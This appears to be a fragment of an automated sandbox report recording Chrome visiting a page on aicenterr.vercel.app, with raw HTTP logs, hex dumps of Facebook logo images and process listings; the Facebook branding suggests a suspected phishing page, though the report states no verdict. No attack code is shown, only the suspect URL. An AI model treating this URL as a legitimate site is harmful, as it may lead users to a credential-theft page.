                            last-modified: Sun, 03 Dec 2023 06:36:25 GMT
                            vary: Accept-Encoding
                            age: 1424
                            x-cache: cp3075 hit, cp3075 hit/43
                            x-cache-status: hit-front
                            server-timing: cache;desc="hit-front", host;desc="cp3075"
                            strict-transport-security: max-age=106384710; includeSubDomains; preload
                            report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                            nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                            x-client-ip: 8.46.123.189
                            x-content-type-options: nosniff
                            access-control-allow-origin: *
                            access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                            timing-allow-origin: *
                            accept-ranges: bytes
                            content-length: 1354
                            connection: close
                            2025-01-14 00:50:08 UTC1354INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 6f 72 3a 20 43 6f 72 65 6c 44 52 41 57 20 58 36 20 2d 2d 3e 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 20 77 69 64 74 68 3d 22 31 34 2e 32 32 32 32 69 6e 22 20 68 65 69 67
                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">... Creator: CorelDRAW X6 --><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="14.2222in" heig


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.549719157.240.251.94433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:08 UTC615OUTGET /rsrc.php/v4/y4/r/N3dO4_SJQPQ.png HTTP/1.1
                            Host: static.xx.fbcdn.net
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://aicenterr.vercel.app/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:08 UTC1877INHTTP/1.1 200 OK
                            Content-Type: image/png
                            Access-Control-Allow-Origin: *
                            Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                            content-md5: TAyLocwrOQvtL8U0ULCIqQ==
                            Expires: Fri, 02 Jan 2026 03:33:16 GMT
                            Cache-Control: public,max-age=31536000,immutable
                            report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                            timing-allow-origin: *
                            document-policy: force-load-at-top
                            permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                            cross-origin-resource-policy: cross-origin
                            X-Content-Type-Options: nosniff
                            reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                            origin-agent-cluster: ?1
                            X-FB-Debug: PUhYhHLOOeOyYr+3HUBc4wjsfvJ0uiXdas5My5Bw9dd0kdRkKxgz7yHwlrEH5yaw3EpelRae2jY7ePpg7HMhrw==
                            Date: Tue, 14 Jan 2025 00:50:08 GMT
                            X-FB-Connection-Quality: GOOD; q=0.7, rtt=93, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=1, ullat=-1
                            Alt-Svc: h3=":443"; ma=86400
                            Connection: close
                            Content-Length: 35332
                            2025-01-14 00:50:08 UTC1INData Raw: 89
                            Data Ascii:
                            2025-01-14 00:50:08 UTC15925INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 77 00 00 00 a4 08 03 00 00 00 5b c3 9e f9 00 00 02 fa 50 4c 54 45 ff ff ff ac da d4 b6 de d9 8f 4f 2a b5 de d8 b0 dc d6 ae db d5 bf e2 dd b4 dd d8 b3 dd d7 b1 dc d6 af db d5 b7 df d9 bb e0 db aa d9 d3 b8 df da b2 dd d7 b9 df da ba e0 db a8 d8 d2 ad da d4 b9 e0 da ab da d4 bd e1 dc b2 dc d7 a9 d9 d3 af db d6 bc e1 dc bc e1 db a7 d8 d2 b1 dc d7 ab d9 d3 b8 df d9 b7 de d9 b6 de d8 ad db d5 a6 d7 d1 a4 d7 d0 a3 d6 d0 07 38 40 a5 d7 d1 12 64 6e 84 c9 c1 a9 d9 d2 be e2 dd b3 dd d8 a6 d8 d1 ad da d5 a2 d6 cf ba e0 da be e1 dc a1 d5 cf a7 d8 d1 be e2 dc 44 5a 69 a9 d8 d2 e8 eb ee e7 97 00 f5 b5 00 91 50 2a e8 f5 f1 95 53 2b 93 52 2a fa c9 39 fb fb fc e9 ec ef f8 f9 fa e6 f4 f1 96 54 2b 4e 7b 7d e7 ea ed 52 7d
                            Data Ascii: PNGIHDRw[PLTEO*8@dnDZiP*S+R*9T+N{}R}
                            2025-01-14 00:50:08 UTC16384INData Raw: ff e3 72 b5 27 9c 6f 0c 65 79 f8 4e 63 21 09 ad 6a ea f6 57 b5 a4 22 07 c1 49 23 23 b0 3b 30 65 2b 4f 56 ee f1 20 04 b7 88 7b f4 3b e9 96 ee 5c 97 55 a3 01 50 4b 3d 70 b8 1a 70 26 96 5d c9 55 e8 1b 7e c3 fa e2 f9 a7 1f b1 23 bf 95 67 fe f2 1b b8 ff f8 2f 5e e3 f7 3f f4 38 8e 27 98 7a e5 b0 1f 79 3f a5 c3 0b a8 a7 7e 7a 3a 4c 01 a7 73 35 74 ce 75 a6 9c 3a 8a a0 94 ba 94 70 98 bc d5 4e 75 46 3f 8d 9a a9 b3 54 7e 52 be 93 30 58 d4 fe a9 9b 7a 4d c1 41 7b b6 d2 3a b0 34 e0 ae 6c af af ef 87 b1 3f b8 7e 1c 7a d0 12 06 75 57 ed 25 8f ca 3d 21 f5 2e 66 09 4b 49 b1 cd f7 8c 6c 89 c8 6a 4a f6 bc 62 5b 02 10 31 29 76 c0 96 94 05 dc 6d 4d 95 66 91 c7 14 f1 54 a7 0d 6d a9 32 ac c1 08 8c a0 18 95 65 56 49 36 1b 62 0d d4 0d 95 50 1f 3c 6d 95 79 19 30 c5 51 42 43 9b 0a
                            Data Ascii: r'oeyNc!jW"I##;0e+OV {;\UPK=pp&]U~#g/^?8'zy?~z:Ls5tu:pNuF?T~R0XzMA{:4l?~zuW%=!.fKIljJb[1)vmMfTm2eVI6bP<my0QBC
                            2025-01-14 00:50:08 UTC3022INData Raw: bd 0c 6b 6e 4c 69 43 b9 de 94 cf ed d5 4d ea 7d bc ca 39 43 74 ae 3e 45 f1 c2 60 59 2c a7 c9 b0 95 b6 39 db 0c 8c 13 f8 e8 e1 8c 1e 29 49 15 6d 00 07 2e e1 e4 a3 78 2b be 63 94 79 32 c1 b6 a3 0f 41 18 02 c0 bb f7 0b f7 62 64 3e 0a f7 4f 7c fd fd 7b 3f ea 3d 79 fc f8 dd eb 56 02 90 62 96 56 5e d8 af 96 ba 10 a0 66 3b 3a 8f ce 79 89 33 d8 1d 32 4f 33 81 0f 7c d6 12 02 f0 24 cc 9d f0 49 34 68 9e b5 9d 4e 1a 03 f9 85 bd 20 06 60 a5 ad 84 c8 27 84 10 82 56 47 a1 a0 ba 70 c2 2e a0 28 33 b6 a6 d3 d5 31 68 32 a3 99 39 48 cb 74 22 a3 da f6 a2 e9 27 e7 dc d3 8c 0d 57 d2 5f 6e 6f ae fa a6 77 29 37 cd 90 b3 b3 4b 0e 04 c2 30 5b 48 93 f8 3c a1 36 cb 00 90 71 4e f6 c4 d6 e5 69 11 ef d1 62 94 40 ca 7b 3f c5 09 a7 c9 2e 0e c5 b3 4d 08 de b6 1a 1b e0 80 d1 43 fa c6 7b 1f
                            Data Ascii: knLiCM}9Ct>E`Y,9)Im.x+cy2Abd>O|{?=yVbV^f;:y32O3|$I4hN `'VGp.(31h29Ht"'W_now)7K0[H<6qNib@{?.MC{


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.549721185.15.59.2404433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:09 UTC397OUTGET /wikipedia/commons/5/51/Facebook_f_logo_%282019%29.svg HTTP/1.1
                            Host: upload.wikimedia.org
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:09 UTC1079INHTTP/1.1 200 OK
                            date: Tue, 14 Jan 2025 00:26:23 GMT
                            server: ATS/9.2.6
                            etag: W/17b573894ed72c1303e934d6bf56cf2f
                            content-type: image/svg+xml
                            x-object-meta-sha1base36: cfdxw9jjhgfj5a46toss1n5nzxbi3yz
                            last-modified: Sun, 03 Dec 2023 06:36:25 GMT
                            vary: Accept-Encoding
                            age: 1425
                            x-cache: cp3075 hit, cp3075 hit/45
                            x-cache-status: hit-front
                            server-timing: cache;desc="hit-front", host;desc="cp3075"
                            strict-transport-security: max-age=106384710; includeSubDomains; preload
                            report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                            nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                            x-client-ip: 8.46.123.189
                            x-content-type-options: nosniff
                            access-control-allow-origin: *
                            access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                            timing-allow-origin: *
                            accept-ranges: bytes
                            content-length: 1354
                            connection: close
                            2025-01-14 00:50:09 UTC1354INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 73 76 67 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 53 56 47 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 47 72 61 70 68 69 63 73 2f 53 56 47 2f 31 2e 31 2f 44 54 44 2f 73 76 67 31 31 2e 64 74 64 22 3e 0d 0a 3c 21 2d 2d 20 43 72 65 61 74 6f 72 3a 20 43 6f 72 65 6c 44 52 41 57 20 58 36 20 2d 2d 3e 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 20 77 69 64 74 68 3d 22 31 34 2e 32 32 32 32 69 6e 22 20 68 65 69 67
                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">... Creator: CorelDRAW X6 --><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" width="14.2222in" heig


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.54972264.29.17.1294433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:09 UTC608OUTGET /favicon.ico HTTP/1.1
                            Host: aicenterr.vercel.app
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://aicenterr.vercel.app/asd.com.html
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:09 UTC363INHTTP/1.1 404 Not Found
                            Cache-Control: public, max-age=0, must-revalidate
                            Content-Length: 39
                            Content-Type: text/plain; charset=utf-8
                            Date: Tue, 14 Jan 2025 00:50:09 GMT
                            Server: Vercel
                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                            X-Vercel-Error: NOT_FOUND
                            X-Vercel-Id: iad1::db9r4-1736815809273-10c733845554
                            Connection: close
                            2025-01-14 00:50:09 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                            Data Ascii: The page could not be foundNOT_FOUND


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.549723157.240.253.14433792C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-14 00:50:09 UTC375OUTGET /rsrc.php/v4/y4/r/N3dO4_SJQPQ.png HTTP/1.1
                            Host: static.xx.fbcdn.net
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-14 00:50:09 UTC1896INHTTP/1.1 200 OK
                            Content-Type: image/png
                            Access-Control-Allow-Origin: *
                            Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                            content-md5: TAyLocwrOQvtL8U0ULCIqQ==
                            Expires: Fri, 02 Jan 2026 03:39:53 GMT
                            Cache-Control: public,max-age=31536000,immutable
                            report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                            timing-allow-origin: *
                            document-policy: force-load-at-top
                            permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                            cross-origin-resource-policy: cross-origin
                            X-Content-Type-Options: nosniff
                            reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                            origin-agent-cluster: ?1
                            x-fb-optimizer: 0
                            X-FB-Debug: Vca4+kZcP4oOZN7+kqjbqN8mowtZzdFAVf1v89AVGgNCgCA/JZDC39FJ9gYEwQ193j6/NRdrs9h3OX1Dcf8ygQ==
                            Date: Tue, 14 Jan 2025 00:50:09 GMT
                            X-FB-Connection-Quality: GOOD; q=0.7, rtt=90, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=3, ullat=-1
                            Alt-Svc: h3=":443"; ma=86400
                            Connection: close
                            Content-Length: 35332
                            2025-01-14 00:50:09 UTC1INData Raw: 89
                            Data Ascii:
                            2025-01-14 00:50:09 UTC15843INData Raw: 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 77 00 00 00 a4 08 03 00 00 00 5b c3 9e f9 00 00 02 fa 50 4c 54 45 ff ff ff ac da d4 b6 de d9 8f 4f 2a b5 de d8 b0 dc d6 ae db d5 bf e2 dd b4 dd d8 b3 dd d7 b1 dc d6 af db d5 b7 df d9 bb e0 db aa d9 d3 b8 df da b2 dd d7 b9 df da ba e0 db a8 d8 d2 ad da d4 b9 e0 da ab da d4 bd e1 dc b2 dc d7 a9 d9 d3 af db d6 bc e1 dc bc e1 db a7 d8 d2 b1 dc d7 ab d9 d3 b8 df d9 b7 de d9 b6 de d8 ad db d5 a6 d7 d1 a4 d7 d0 a3 d6 d0 07 38 40 a5 d7 d1 12 64 6e 84 c9 c1 a9 d9 d2 be e2 dd b3 dd d8 a6 d8 d1 ad da d5 a2 d6 cf ba e0 da be e1 dc a1 d5 cf a7 d8 d1 be e2 dc 44 5a 69 a9 d8 d2 e8 eb ee e7 97 00 f5 b5 00 91 50 2a e8 f5 f1 95 53 2b 93 52 2a fa c9 39 fb fb fc e9 ec ef f8 f9 fa e6 f4 f1 96 54 2b 4e 7b 7d e7 ea ed 52 7d
                            Data Ascii: PNGIHDRw[PLTEO*8@dnDZiP*S+R*9T+N{}R}
                            2025-01-14 00:50:09 UTC16384INData Raw: d5 1d 80 53 d6 80 a0 5e b3 d4 1a ec 01 95 25 0d a4 60 0c 5a e7 41 4e b6 c6 89 aa 8e 6a 87 de a3 74 55 eb af a6 69 9a ab 96 38 bc 3f 3b a3 fd cb 20 ad 1e ce fd 08 7d 0f ca db 51 37 8d b6 fe 0e d9 7e ae 6e af 4b 32 e7 31 62 52 cf dd 0d d9 b2 e0 01 ff e3 72 b5 27 9c 6f 0c 65 79 f8 4e 63 21 09 ad 6a ea f6 57 b5 a4 22 07 c1 49 23 23 b0 3b 30 65 2b 4f 56 ee f1 20 04 b7 88 7b f4 3b e9 96 ee 5c 97 55 a3 01 50 4b 3d 70 b8 1a 70 26 96 5d c9 55 e8 1b 7e c3 fa e2 f9 a7 1f b1 23 bf 95 67 fe f2 1b b8 ff f8 2f 5e e3 f7 3f f4 38 8e 27 98 7a e5 b0 1f 79 3f a5 c3 0b a8 a7 7e 7a 3a 4c 01 a7 73 35 74 ce 75 a6 9c 3a 8a a0 94 ba 94 70 98 bc d5 4e 75 46 3f 8d 9a a9 b3 54 7e 52 be 93 30 58 d4 fe a9 9b 7a 4d c1 41 7b b6 d2 3a b0 34 e0 ae 6c af af ef 87 b1 3f b8 7e 1c 7a d0 12 06
                            Data Ascii: S^%`ZANjtUi8?; }Q7~nK21bRr'oeyNc!jW"I##;0e+OV {;\UPK=pp&]U~#g/^?8'zy?~z:Ls5tu:pNuF?T~R0XzMA{:4l?~z
                            2025-01-14 00:50:09 UTC3104INData Raw: 5f bd f0 3c f2 55 6b 51 c7 85 30 80 27 99 58 46 23 18 e3 b0 f8 56 4d 0b a8 14 85 cd 66 7a 76 a4 d8 21 a4 99 67 f4 67 12 cb d1 81 24 1b 33 5b bb c4 84 de b1 2c 64 4e 60 c0 6a 46 c2 99 f1 24 a3 18 06 0a 72 64 1b 3a 90 00 28 12 64 a4 56 77 e1 a2 ef bd 0c 6b 6e 4c 69 43 b9 de 94 cf ed d5 4d ea 7d bc ca 39 43 74 ae 3e 45 f1 c2 60 59 2c a7 c9 b0 95 b6 39 db 0c 8c 13 f8 e8 e1 8c 1e 29 49 15 6d 00 07 2e e1 e4 a3 78 2b be 63 94 79 32 c1 b6 a3 0f 41 18 02 c0 bb f7 0b f7 62 64 3e 0a f7 4f 7c fd fd 7b 3f ea 3d 79 fc f8 dd eb 56 02 90 62 96 56 5e d8 af 96 ba 10 a0 66 3b 3a 8f ce 79 89 33 d8 1d 32 4f 33 81 0f 7c d6 12 02 f0 24 cc 9d f0 49 34 68 9e b5 9d 4e 1a 03 f9 85 bd 20 06 60 a5 ad 84 c8 27 84 10 82 56 47 a1 a0 ba 70 c2 2e a0 28 33 b6 a6 d3 d5 31 68 32 a3 99 39 48
                            Data Ascii: _<UkQ0'XF#VMfzv!gg$3[,dN`jF$rd:(dVwknLiCM}9Ct>E`Y,9)Im.x+cy2Abd>O|{?=yVbV^f;:y32O3|$I4hN `'VGp.(31h29H


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:19:49:57
                            Start date:13/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff715980000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:19:49:59
                            Start date:13/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,10313533419984869242,4354048946415296629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff715980000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:3
                            Start time:19:50:05
                            Start date:13/01/2025
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://aicenterr.vercel.app/asd.com.html"
                            Imagebase:0x7ff715980000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly